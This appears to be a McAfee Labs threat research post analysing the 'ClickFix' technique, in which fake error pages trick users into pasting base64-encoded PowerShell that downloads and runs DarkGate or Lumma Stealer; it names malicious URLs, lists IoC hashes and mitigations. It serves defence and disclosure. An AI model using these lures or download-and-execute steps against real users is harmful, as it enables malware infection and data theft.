Authored by Yashvi Shah and Vignesh Dhatchanamoorthy
McAfee Labs has discovered a highly unusual method of malware delivery, referred to by researchers as the “Clickfix” infection chain. The attack chain begins with users being lured to visit seemingly legitimate but compromised websites. Upon visiting, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal.
The “ClickFix” infection chain represents a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. These compromised websites are often carefully crafted to look genuine, increasing the likelihood of user compliance. Once the script is pasted and executed in the PowerShell terminal, it allows the malware to infiltrate the victim’s system, potentially leading to data theft, system compromise, or further propagation of the malware.
We have observed malware families such as Lumma Stealer and DarkGate leveraging this technique. Here is the heatmap showing the distribution of users affected by the “Clickfix” technique:
Figure 1:Prevalence for the last three months
Darkgate ingesting via “ClickFix”
DarkGate is a sophisticated malware known for its ability to steal sensitive information, provide remote access, and establish persistent backdoors in compromised systems. It employs advanced evasion tactics and can spread within networks, making it a significant cybersecurity threat.
McAfee Labs obtained a phishing email from the spamtrap, having an HTML attachment.
Figure 2: Email with Attachment
The HTML file masquerades as a Word document, displaying an error prompt to deceive users. This tactic is used to trick users into taking actions that could lead to the download and execution of malicious software.
Figure 3: Displays extension problem issue
As shown, the sample displays a message stating, “The ‘Word Online’ extension is NOT installed in your browser. To view the document offline, click the ‘How to fix’ button.”
Before clicking on this button, let’s examine the underlying code. Upon examining the code, it was discovered that there were several base64-encoded content blocks present. Of particular significance was one found within the <Title> tag, which played a crucial role in this scenario.
Figure 4: HTML contains Base64-encoded content in the title tag
Decoding this we get,
Figure 5: After decoding the code
The decoded command demands PowerShell to carry out malicious activities on a system. It starts by downloading an HTA (HTML Application) file from the URL https://www.rockcreekdds.com/wp-content/1[.]hta and saves it locally as C:\users\public\Ix.hta.
The script then executes this HTA file using the start-process command, which initiates harmful actions on the system. Additionally, the script includes a command (Set-Clipboard -Value ‘ ‘) to clear the contents of the clipboard. After completing its tasks, the script terminates the PowerShell session with exit.
Upon further inspection of the HTML page, we found a javascript at the end of the code.
Figure 6: Decoding function snippet
This JavaScript snippet decodes and displays a payload, manages modal interactions for user feedback, and provides functionality for copying content to the clipboard upon user action.
In a nutshell, clicking on the “How to fix” button triggers the execution of JavaScript code that copies the PowerShell script directly onto the clipboard. This script, as previously discussed, includes commands to download and execute an HTA file from a remote server.
Let’s delve into it practically:
Figure 7: Clipboard contains malicious command
The attackers’ additional instruction to press Windows+R (which opens the Run dialog) and then press CTRL+V (which pastes the contents from the clipboard) suggests a social engineering tactic to further convince the user to execute the PowerShell script. This sequence of actions is intended to initiate the downloaded script (likely stored in the clipboard) without the user fully understanding its potentially malicious nature.
Once the user does this, the HTA file gets downloaded.
Figure 8: HTA code snippet
The above file attempts to connect to the marked domain and execute a PowerShell file from this malicious source. Given below is the malicious script that is stored remotely and executed.
Figure 9: Powershell code snippet
As this PowerShell script is executed implicitly without any user interaction, a folder is created in the C drive where an AutoIt executable and script are dropped and executed automatically.
Figure 10: Downloaded zip contains AutoIT script
Following this, DarkGate begins its malicious activity and starts communicating with its command and control (C2) server.
A similar Clickfix social engineering technique was found to be dropping Lumma Stealer.
Lumma Stealer ingesting via “ClickFix”
McAfee Labs discovered a website displaying an error message indicating that the browser is encountering issues displaying the webpage. The site provides steps to fix the problem, which are designed to deceive users into executing malicious actions.
Figure 11: Showing error on accessing the webpage
It directs the target user to perform the following steps:
- Click on the “Copy Fix” button.
- Right-click on the Windows icon.
- Open Windows PowerShell (Admin).
- Right-click within the open terminal window.
- Wait for the update to complete.
Let’s analyze the code that gets copied when clicking the “Copy Fix” button.
Figure 12: Base64-encoded content
As we can see, the code includes base64-encoded content. Decoding this content, we get the following script:
Figure 13: After decoding the Base64 content
This PowerShell script flushes the DNS cache and then decodes a base64-encoded command to fetch and execute a script from a remote URL https://weoleycastletaxis.co.uk/chao/baby/cow[.]html, masquerading the request with a specific User-Agent header. The fetched script is then executed, and the screen is cleared to hide the actions. Subsequently, it decodes another base64 string to execute a command that sets the clipboard content to a space character. The script is likely designed for malicious purposes, such as downloading and executing remote code covertly while attempting to hide its activity from the user.
Upon execution, the following process tree flashes:
Figure 14: Process Tree
As we know it is downloading the malware from the given URL, a new folder is created in a Temp folder and a zip is downloaded:
Figure 15: Network activity
The malware is unzipped and dropped in the same folder:
Figure 16: Dropped files
The malware starts communicating with its C2 server as soon as it gets dropped in the targeted system.
Conclusion:
In conclusion, the Clickfix social engineering technique showcases a highly effective and technical method for malware deployment. By embedding base64-encoded scripts within seemingly legitimate error prompts, attackers deceive users into performing a series of actions that result in the execution of malicious PowerShell commands. These commands typically download and execute payloads, such as HTA files, from remote servers, subsequently deploying malware like DarkGate and Lumma Stealer.
Once the malware is active on the system, it begins its malicious activities, including stealing users’ personal data and sending it to its command and control (C2) server. The script execution often includes steps to evade detection and maintain persistence, such as clearing clipboard contents and running processes in minimized windows. By disguising error messages and providing seemingly helpful instructions, attackers manipulate users into unknowingly executing harmful scripts that download and run various kinds of malware.
Mitigations:
At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the Clickfix social engineering technique. Here are our recommended mitigations and remediations:
- Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
- Install and maintain updated antivirus and anti-malware software on all endpoints.
- Implement robust email filtering to block phishing emails and malicious attachments.
- Use web filtering solutions to prevent access to known malicious websites.
- Deploy firewalls and intrusion detection/prevention systems (IDS/IPS) to monitor and block malicious network traffic.
- Use network segmentation to limit the spread of malware within the organization.
- Enforce the principle of least privilege (PoLP) to minimize user access to only necessary resources.
- Implement security policies to monitor and restrict clipboard usage, especially in sensitive environments.
- Implement multi-factor authentication (MFA) for accessing sensitive systems and data.
- Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
- Continuously monitor and analyze system and network logs for signs of compromise.
- Encrypt sensitive data both in transit and at rest to protect it from unauthorized access.
- Regularly back up important data and store backups securely to ensure data recovery in case of a ransomware attack or data breach.
Indicators of Compromise (IoCs)
File | SHA256 |
DarkGate | |
c5545d28faee14ed94d650bda28124743e2d7dacdefc8bf4ec5fc76f61756df3 | |
Html | 0db16db812cb9a43d5946911501ee8c0f1e3249fb6a5e45ae11cef0dddbe4889 |
HTA | 5c204217d48f2565990dfdf2269c26113bd14c204484d8f466fb873312da80cf |
PS | e9ad648589aa3e15ce61c6a3be4fc98429581be738792ed17a713b4980c9a4a2 |
ZIP | 8c382d51459b91b7f74b23fbad7dd2e8c818961561603c8f6614edc9bb1637d1 |
AutoIT script | 7d8a4aa184eb350f4be8706afb0d7527fca40c4667ab0491217b9e1e9d0f9c81 |
Lumma Stealer | |
URL | tuchinehd[.]com |
PS | 07594ba29d456e140a171cba12d8d9a2db8405755b81da063a425b1a8b50d073 |
ZIP | 6608aeae3695b739311a47c63358d0f9dbe5710bd0073042629f8d9c1df905a8 |
EXE | e60d911f2ef120ed782449f1136c23ddf0c1c81f7479c5ce31ed6dcea6f6adf9 |